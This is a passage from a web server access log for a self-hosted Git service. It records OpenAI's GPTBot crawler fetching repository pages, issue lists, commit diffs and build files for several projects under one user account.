"https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.2" +[17/Feb/2026:16:36:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=leastissues&state=open" [Client 74.7.227.38] [Length 8494] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?q=&sort=leastissues&state=closed" +[17/Feb/2026:16:36:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=leastissues&state=all" [Client 74.7.227.38] [Length 8492] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?q=&sort=leastissues&state=open" +[17/Feb/2026:16:36:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=mostcomplete&state=all" [Client 74.7.227.38] [Length 8503] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?q=&sort=mostcomplete&state=open" +[17/Feb/2026:16:36:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=mostissues&state=open" [Client 74.7.227.38] [Length 8496] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?q=&sort=mostissues&state=closed" +[17/Feb/2026:16:36:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=PostgresWatchdog%2flibssl-3-x64.dll" [Client 74.7.227.38] [Length 23769] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libssl-3-x64.dll" +[17/Feb/2026:16:36:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 11011] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:36:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=html" [Client 74.7.227.38] [Length 106998] [Gzip 11.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" +[17/Feb/2026:16:36:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 10144] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:16:36:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&state=closed&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=all&type=all" +[17/Feb/2026:16:36:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2fbin%2fpip" [Client 74.7.227.38] [Length 24083] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:16:36:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 11009] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:16:36:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:16:36:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 11008] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:16:36:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 11011] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:16:36:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/package.json?display=source" [Client 74.7.227.38] [Length 11928] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/package.json" +[17/Feb/2026:16:36:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 9966] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls" +[17/Feb/2026:16:36:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 9967] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:16:36:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 72033] [Gzip 33.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:16:36:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:16:37:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 28704] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:16:37:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10878] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.tsx" +[17/Feb/2026:16:37:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11665] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.tsx" +[17/Feb/2026:16:37:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.tsx" +[17/Feb/2026:16:37:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.tsx" +[17/Feb/2026:16:37:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11666] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.tsx" +[17/Feb/2026:16:37:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10905] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.tsx" +[17/Feb/2026:16:37:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.tsx" +[17/Feb/2026:16:37:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11637] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.tsx" +[17/Feb/2026:16:37:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11665] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.tsx" +[17/Feb/2026:16:37:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 25945] [Gzip 4.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.5_Final.spec" +[17/Feb/2026:16:37:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fdata_fetcher%2fusdkrw_fetcher.py" [Client 74.7.227.38] [Length 23157] [Gzip 4.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/usdkrw_fetcher.py" +[17/Feb/2026:16:37:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fdata_fetcher%2fkrx_gold_fetcher.py" [Client 74.7.227.38] [Length 22892] [Gzip 4.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/krx_gold_fetcher.py" +[17/Feb/2026:16:37:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 25944] [Gzip 4.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.6_Final.spec" +[17/Feb/2026:16:37:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.3" [Client 74.7.227.38] [Length 30697] [Gzip 6.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:16:37:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 34900] [Gzip 7.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1%20copy.py" +[17/Feb/2026:16:37:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.2" [Client 74.7.227.38] [Length 30990] [Gzip 6.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:16:37:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fdata_fetcher%2finvesting_fetcher.py" [Client 74.7.227.38] [Length 23804] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/investing_fetcher.py" +[17/Feb/2026:16:37:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=PostgresWatchdog%2flibstdc%2b%2b-6.dll" [Client 74.7.227.38] [Length 23782] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libstdc++-6.dll" +[17/Feb/2026:16:37:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fdata_fetcher%2fapi_fetcher.py" [Client 74.7.227.38] [Length 23731] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/api_fetcher.py" +[17/Feb/2026:16:37:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.1" [Client 74.7.227.38] [Length 30962] [Gzip 6.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:16:37:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2fobj%2fDebug%2fnet8.0%2fOpcConnectionTest.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 21155] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" +[17/Feb/2026:16:37:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?state=all" [Client 74.7.227.38] [Length 8457] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones" +[17/Feb/2026:16:37:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&state=open&type=all" [Client 74.7.227.38] [Length 9977] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls" +[17/Feb/2026:16:37:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14310] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:16:37:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14286] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:16:37:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11043] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:16:37:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11044] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:16:37:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11042] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:16:37:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11043] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:16:37:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14310] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:16:37:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11021] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:16:37:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14309] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 